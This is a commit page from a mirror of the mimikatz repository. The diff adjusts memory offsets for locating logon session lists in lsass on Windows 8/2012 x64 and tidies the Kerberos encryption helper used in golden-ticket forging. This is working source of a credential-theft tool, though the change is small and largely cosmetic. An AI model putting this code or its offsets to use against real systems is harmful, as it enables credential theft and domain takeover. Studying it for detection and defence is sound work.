RepoMirrors
/
mimikatz
mirror of https://github.com/gentilkiwi/mimikatz
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixed LogonSessionListCount for 8.0/2012 x64 (Yeah, Joe tested on this platform ;))

This commit is contained in:
Benjamin DELPY 2014-05-23 19:22:32 +02:00
parent 58b14945db
commit 029d72bdaf
5 changed files with 10 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
mimikatz/modules/kerberos/kuhl_m_kerberos.c
View File

@ -336,12 +336,12 @@ NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID * output, DWORD * outputSize, BOOL encrypt)
NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID *output, DWORD *outputSize, BOOL encrypt)
{
NTSTATUS status;
PKERB_ECRYPT pCSystem;
PVOID pContext;
DWORD bufferSize;
//DWORD bufferSize;
status = CDLocateCSystem(eType, &pCSystem);
if(NT_SUCCESS(status))
@ -349,8 +349,8 @@ NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD
status = pCSystem->Initialize(key, keySize, keyUsage, &pContext);
if(NT_SUCCESS(status))
{
bufferSize = encrypt ? (dataSize + pCSystem->Size) : (dataSize /*- pCSystem->Size*/);
if(*output = LocalAlloc(LPTR, bufferSize))
*outputSize = encrypt ? (dataSize + pCSystem->Size) : dataSize;
if(*output = LocalAlloc(LPTR, *outputSize))
{
status = encrypt ? pCSystem->Encrypt(pContext, data, dataSize, *output, outputSize) : pCSystem->Decrypt(pContext, data, dataSize, *output, outputSize);
if(!NT_SUCCESS(status))

2
mimikatz/modules/kerberos/kuhl_m_kerberos.h
View File

@ -35,4 +35,4 @@ NTSTATUS kuhl_m_kerberos_decode(int argc, wchar_t * argv[]);
wchar_t * kuhl_m_kerberos_generateFileName(const DWORD index, PKERB_TICKET_CACHE_INFO_EX ticket, LPCWSTR ext);
struct _DIRTY_ASN1_SEQUENCE_EASY * kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, PISID sid, LPCBYTE krbtgt, DWORD userid, PGROUP_MEMBERSHIP groups, DWORD cbGroups);
NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID * output, DWORD * outputSize, BOOL encrypt);
NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID *output, DWORD *outputSize, BOOL encrypt);

2
mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h
View File

@ -34,7 +34,7 @@ typedef struct _USER_SESSION_KEY {
UCHAR data[16];
} USER_SESSION_KEY;
typedef struct _KERB_SID_AND_ATTRIBUTES{
typedef struct _KERB_SID_AND_ATTRIBUTES {
PISID Sid;
DWORD Attributes;
} KERB_SID_AND_ATTRIBUTES, *PKERB_SID_AND_ATTRIBUTES;

1
mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
View File

@ -314,7 +314,6 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000))
helper++; // yeah, really, I do that =)
securityStruct.hMemory = cLsass.hLsassMem;
securityStruct.address = LogonSessionListCount;

5
mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
View File

@ -14,7 +14,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}},
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -60}},
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -59}},
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -61}},
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -0}},
{KULL_M_WIN_MIN_BUILD_BLUE, {sizeof(PTRN_WIN81_LogonSessionList), PTRN_WIN81_LogonSessionList}, {0, NULL}, {-4, -53}},
};
#elif defined _M_IX86
@ -37,6 +37,9 @@ PULONG LogonSessionListCount = NULL;
BOOL kuhl_m_sekurlsa_utils_search(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib)
{
PVOID *pLogonSessionListCount = (cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_2K3) ? NULL : ((PVOID *) &LogonSessionListCount);
#ifdef _M_X64
LsaSrvReferences[4].Offsets.off1 = (pLib->Informations.TimeDateStamp > 0x53480000) ? -54 : -61; // 6.2 post or pre KB
#endif
return kuhl_m_sekurlsa_utils_search_generic(cLsass, pLib, LsaSrvReferences, sizeof(LsaSrvReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &LogonSessionList, pLogonSessionListCount, NULL);
}